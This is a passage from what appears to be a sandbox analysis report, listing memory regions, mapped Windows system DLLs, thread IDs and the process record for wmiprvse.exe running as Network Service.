0x75290000 end_va = 0x752cbfff monitored = 0 entry_point = 0x7529145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1041 start_va = 0x752d0000 end_va = 0x752e6fff monitored = 0 entry_point = 0x752d3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1042 start_va = 0x753a0000 end_va = 0x753cafff monitored = 0 entry_point = 0x753a1bfc region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 1043 start_va = 0x753e0000 end_va = 0x753e5fff monitored = 0 entry_point = 0x753e22c7 region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 1044 start_va = 0x753f0000 end_va = 0x753f6fff monitored = 0 entry_point = 0x753f2e67 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1045 start_va = 0x75400000 end_va = 0x75416fff monitored = 0 entry_point = 0x75403574 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1046 start_va = 0x75460000 end_va = 0x7547afff monitored = 0 entry_point = 0x75461286 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1047 start_va = 0x75490000 end_va = 0x754d1fff monitored = 0 entry_point = 0x75491360 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1048 start_va = 0x754e0000 end_va = 0x754f0fff monitored = 0 entry_point = 
0x754e4982 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 1049 start_va = 0x756b0000 end_va = 0x756c8fff monitored = 0 entry_point = 0x756b1319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1050 start_va = 0x75720000 end_va = 0x75727fff monitored = 0 entry_point = 0x757210e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1051 start_va = 0x75740000 end_va = 0x7575afff monitored = 0 entry_point = 0x757493b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1052 start_va = 0x75760000 end_va = 0x7576bfff monitored = 0 entry_point = 0x757610e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1053 start_va = 0x75770000 end_va = 0x757cefff monitored = 0 entry_point = 0x75772134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1054 start_va = 0x757d0000 end_va = 0x757f8fff monitored = 0 entry_point = 0x757d6b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1055 start_va = 0x75800000 end_va = 0x7580dfff monitored = 0 entry_point = 0x75801235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1056 start_va = 0x75810000 end_va = 0x7581afff monitored = 0 entry_point = 0x75811992 region_type = mapped_file name = 
"profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1057 start_va = 0x75880000 end_va = 0x7588bfff monitored = 0 entry_point = 0x7588238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1058 start_va = 0x75920000 end_va = 0x7594efff monitored = 0 entry_point = 0x75922a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1059 start_va = 0x75950000 end_va = 0x75a70fff monitored = 0 entry_point = 0x7595158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1060 start_va = 0x75a80000 end_va = 0x75aa6fff monitored = 0 entry_point = 0x75a858b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1061 start_va = 0x75ab0000 end_va = 0x75afafff monitored = 0 entry_point = 0x75ab7e10 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1062 start_va = 0x75b00000 end_va = 0x75b11fff monitored = 0 entry_point = 0x75b01441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1063 start_va = 0x75ba0000 end_va = 0x75bedfff monitored = 0 entry_point = 0x75ba9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1064 start_va = 0x75c50000 end_va = 0x75decfff monitored = 0 entry_point = 0x75c517e7 region_type = mapped_file name = "setupapi.dll" filename = 
"\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1065 start_va = 0x75df0000 end_va = 0x75e90fff monitored = 0 entry_point = 0x75e22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1066 start_va = 0x75ea0000 end_va = 0x75ebefff monitored = 0 entry_point = 0x75ea1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1067 start_va = 0x75ec0000 end_va = 0x75f8bfff monitored = 0 entry_point = 0x75ec168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1068 start_va = 0x75f90000 end_va = 0x75f95fff monitored = 0 entry_point = 0x75f91782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1069 start_va = 0x75fa0000 end_va = 0x75ff6fff monitored = 0 entry_point = 0x75fb9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1070 start_va = 0x76000000 end_va = 0x76034fff monitored = 0 entry_point = 0x7600145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1071 start_va = 0x76040000 end_va = 0x76113fff monitored = 0 entry_point = 0x7608ce6f region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1072 start_va = 0x76120000 end_va = 0x76124fff monitored = 0 entry_point = 0x76121438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") 
Region: id = 1073 start_va = 0x76130000 end_va = 0x761cffff monitored = 0 entry_point = 0x761449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1074 start_va = 0x761d0000 end_va = 0x7626cfff monitored = 0 entry_point = 0x76203fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1075 start_va = 0x76270000 end_va = 0x7631bfff monitored = 0 entry_point = 0x7627a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1076 start_va = 0x76460000 end_va = 0x76478fff monitored = 0 entry_point = 0x76464975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1077 start_va = 0x76480000 end_va = 0x765dbfff monitored = 0 entry_point = 0x764cba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1078 start_va = 0x766e0000 end_va = 0x767a8fff monitored = 0 entry_point = 0x766fd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1079 start_va = 0x767b0000 end_va = 0x767b9fff monitored = 0 entry_point = 0x767b136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1080 start_va = 0x769c0000 end_va = 0x76a4efff monitored = 0 entry_point = 0x769c3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1081 start_va = 0x76a80000 end_va = 0x776c9fff monitored = 0 
entry_point = 0x76b01601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1082 start_va = 0x776d0000 end_va = 0x7780bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1083 start_va = 0x77810000 end_va = 0x77892fff monitored = 0 entry_point = 0x778123d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1084 start_va = 0x778b0000 end_va = 0x778f4fff monitored = 0 entry_point = 0x778b11e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1085 start_va = 0x77910000 end_va = 0x77910fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1086 start_va = 0x7f6f0000 end_va = 0x7f7effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1087 start_va = 0x7ff8a000 end_va = 0x7ff8afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff8a000" filename = "" Region: id = 1088 start_va = 0x7ff8b000 end_va = 0x7ff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff8b000" filename = "" Region: id = 1089 start_va = 0x7ff8c000 end_va = 0x7ff8cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff8c000" filename = "" Region: id = 1090 start_va = 0x7ff8e000 end_va = 0x7ff8efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff8e000" filename = "" Region: id = 1091 start_va = 
0x7ff8f000 end_va = 0x7ff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff8f000" filename = "" Region: id = 1092 start_va = 0x7ff90000 end_va = 0x7ff90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff90000" filename = "" Region: id = 1093 start_va = 0x7ff91000 end_va = 0x7ff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff91000" filename = "" Region: id = 1094 start_va = 0x7ff92000 end_va = 0x7ff92fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff92000" filename = "" Region: id = 1095 start_va = 0x7ff94000 end_va = 0x7ff94fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff94000" filename = "" Region: id = 1096 start_va = 0x7ff95000 end_va = 0x7ff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff95000" filename = "" Region: id = 1097 start_va = 0x7ff96000 end_va = 0x7ff96fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff96000" filename = "" Region: id = 1098 start_va = 0x7ff97000 end_va = 0x7ff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff97000" filename = "" Region: id = 1099 start_va = 0x7ff9a000 end_va = 0x7ff9afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff9a000" filename = "" Region: id = 1100 start_va = 0x7ff9b000 end_va = 0x7ff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff9b000" filename = "" Region: id = 1101 start_va = 0x7ff9d000 end_va = 0x7ff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff9d000" filename = "" Region: id = 1102 start_va = 0x7ff9e000 end_va = 0x7ff9efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff9e000" filename = "" Region: id = 1103 start_va = 0x7ffa1000 end_va = 0x7ffa1fff 
monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffa1000" filename = "" Region: id = 1104 start_va = 0x7ffa2000 end_va = 0x7ffa2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffa2000" filename = "" Region: id = 1105 start_va = 0x7ffa6000 end_va = 0x7ffa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffa6000" filename = "" Region: id = 1106 start_va = 0x7ffa7000 end_va = 0x7ffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffa7000" filename = "" Region: id = 1107 start_va = 0x7ffa8000 end_va = 0x7ffa8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffa8000" filename = "" Region: id = 1108 start_va = 0x7ffaa000 end_va = 0x7ffaafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 1109 start_va = 0x7ffab000 end_va = 0x7ffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 1110 start_va = 0x7ffac000 end_va = 0x7ffacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 1111 start_va = 0x7ffad000 end_va = 0x7ffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 1112 start_va = 0x7ffae000 end_va = 0x7ffaefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 1113 start_va = 0x7ffaf000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 1114 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1115 start_va = 0x7ffd3000 end_va = 0x7ffd3fff monitored = 1 
entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 1116 start_va = 0x7ffd4000 end_va = 0x7ffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 1117 start_va = 0x7ffd5000 end_va = 0x7ffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1118 start_va = 0x7ffd6000 end_va = 0x7ffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 1119 start_va = 0x7ffd7000 end_va = 0x7ffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 1120 start_va = 0x7ffd8000 end_va = 0x7ffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1121 start_va = 0x7ffd9000 end_va = 0x7ffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1122 start_va = 0x7ffda000 end_va = 0x7ffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1123 start_va = 0x7ffdb000 end_va = 0x7ffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1124 start_va = 0x7ffdc000 end_va = 0x7ffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1125 start_va = 0x7ffdd000 end_va = 0x7ffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1126 start_va = 0x7ffde000 end_va = 0x7ffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1127 start_va = 0x7ffdf000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = 
private name = "private_0x000000007ffdf000" filename = "" Region: id = 1550 start_va = 0x1a90000 end_va = 0x1acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a90000" filename = "" Region: id = 1551 start_va = 0x7ffa4000 end_va = 0x7ffa4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffa4000" filename = "" Region: id = 1582 start_va = 0x1840000 end_va = 0x187ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001840000" filename = "" Thread: id = 27 os_tid = 0x4d0 Thread: id = 28 os_tid = 0xf5c Thread: id = 29 os_tid = 0xf58 Thread: id = 30 os_tid = 0xe84 Thread: id = 31 os_tid = 0x81c Thread: id = 32 os_tid = 0x810 Thread: id = 33 os_tid = 0x804 Thread: id = 34 os_tid = 0x3b8 Thread: id = 35 os_tid = 0x150 Thread: id = 36 os_tid = 0x5ac Thread: id = 37 os_tid = 0x398 Thread: id = 38 os_tid = 0x148 Thread: id = 39 os_tid = 0x2fc Thread: id = 40 os_tid = 0x228 Thread: id = 41 os_tid = 0x110 Thread: id = 42 os_tid = 0x710 Thread: id = 43 os_tid = 0x37c Thread: id = 44 os_tid = 0x4a8 Thread: id = 45 os_tid = 0x454 Thread: id = 46 os_tid = 0x11c Thread: id = 47 os_tid = 0xf4 Thread: id = 48 os_tid = 0x7f4 Thread: id = 49 os_tid = 0x794 Thread: id = 50 os_tid = 0x78c Thread: id = 51 os_tid = 0x770 Thread: id = 52 os_tid = 0x754 Thread: id = 53 os_tid = 0x73c Thread: id = 54 os_tid = 0x730 Thread: id = 55 os_tid = 0x510 Thread: id = 56 os_tid = 0x508 Thread: id = 57 os_tid = 0x504 Thread: id = 58 os_tid = 0x4e4 Thread: id = 59 os_tid = 0x4d8 Thread: id = 60 os_tid = 0x450 Thread: id = 61 os_tid = 0x3f4 Thread: id = 62 os_tid = 0x3e4 Thread: id = 63 os_tid = 0x3d8 Thread: id = 64 os_tid = 0x33c Thread: id = 65 os_tid = 0x334 Thread: id = 83 os_tid = 0x8dc Thread: id = 84 os_tid = 0x8e0 Thread: id = 85 os_tid = 0x8e4 Thread: id = 102 os_tid = 0xb10 Thread: id = 117 os_tid = 0xddc Process: id = "5" image_name = "wmiprvse.exe" filename = 
"c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x7ef47c40" os_pid = "0xd4c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x248" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:000442f9" [0xc000000f] Region: id = 1128 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1129 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1130 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1131 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1132 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1133 start_va = 0xc0000 end_va = 0x119fff monitored = 0 entry_point = 0xfa810 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 1134 start_va = 0x120000 end_va = 0x1e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1135 
start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1136 start_va = 0x200000 end_va = 0x200fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1137 start_va = 0x210000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1138 start_va = 0x250000 end_va = 0x350fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1139 start_va = 0x360000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 1140 start_va = 0x3e0000 end_va = 0x3e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1141 start_va = 0x3f0000 end_va = 0x3f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1142 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1143 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1144 start_va = 0x420000 end_va = 0x42cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 1145 start_va = 0x430000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 
1146 start_va = 0x530000 end_va = 0x7fefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1147 start_va = 0x800000 end_va = 0x801fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 1148 start_va = 0x820000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 1149 start_va = 0x860000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1150 start_va = 0x8a0000 end_va = 0x8a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cimwin32.dll.mui" filename = "\\Windows\\System32\\wbem\\en-US\\cimwin32.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\cimwin32.dll.mui") Region: id = 1151 start_va = 0x940000 end_va = 0x97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 1152 start_va = 0x980000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 1153 start_va = 0x9c0000 end_va = 0xabffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 1154 start_va = 0xb90000 end_va = 0xbcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 1155 start_va = 0xbd0000 end_va = 0xc0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 1156 start_va = 0xc40000 end_va = 0xc7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 1157 
start_va = 0xcd0000 end_va = 0xd0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 1158 start_va = 0xd10000 end_va = 0xe0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 1159 start_va = 0x69f80000 end_va = 0x69f82fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "security.dll" filename = "\\Windows\\System32\\security.dll" (normalized: "c:\\windows\\system32\\security.dll") Region: id = 1160 start_va = 0x69f90000 end_va = 0x69f96fff monitored = 0 entry_point = 0x69f91230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1161 start_va = 0x6a000000 end_va = 0x6a007fff monitored = 0 entry_point = 0x6a0011fc region_type = mapped_file name = "schedcli.dll" filename = "\\Windows\\System32\\schedcli.dll" (normalized: "c:\\windows\\system32\\schedcli.dll") Region: id = 1162 start_va = 0x6a010000 end_va = 0x6a159fff monitored = 0 entry_point = 0x6a0308ae region_type = mapped_file name = "cimwin32.dll" filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll") Region: id = 1163 start_va = 0x6a790000 end_va = 0x6a7b9fff monitored = 0 entry_point = 0x6a7a1d3d region_type = mapped_file name = "wmipcima.dll" filename = "\\Windows\\System32\\wbem\\wmipcima.dll" (normalized: "c:\\windows\\system32\\wbem\\wmipcima.dll") Region: id = 1164 start_va = 0x6aba0000 end_va = 0x6abacfff monitored = 0 entry_point = 0x6aba12d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 1165 start_va = 0x6b110000 end_va = 0x6b112fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wmi.dll" filename = "\\Windows\\System32\\wmi.dll" (normalized: 
"c:\\windows\\system32\\wmi.dll") Region: id = 1166 start_va = 0x70940000 end_va = 0x70974fff monitored = 0 entry_point = 0x7095ee80 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1167 start_va = 0x70b00000 end_va = 0x70b0afff monitored = 0 entry_point = 0x70b01200 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1168 start_va = 0x734a0000 end_va = 0x734aefff monitored = 0 entry_point = 0x734a7f10 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1169 start_va = 0x735b0000 end_va = 0x735c9fff monitored = 0 entry_point = 0x735c03d0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1170 start_va = 0x73620000 end_va = 0x7362efff monitored = 0 entry_point = 0x736293d0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1171 start_va = 0x73810000 end_va = 0x7381afff monitored = 0 entry_point = 0x738152a0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1172 start_va = 0x73820000 end_va = 0x73837fff monitored = 0 entry_point = 0x73821335 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1173 start_va = 0x73840000 end_va = 0x738e5fff monitored = 0 entry_point = 0x738aa2f0 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: 
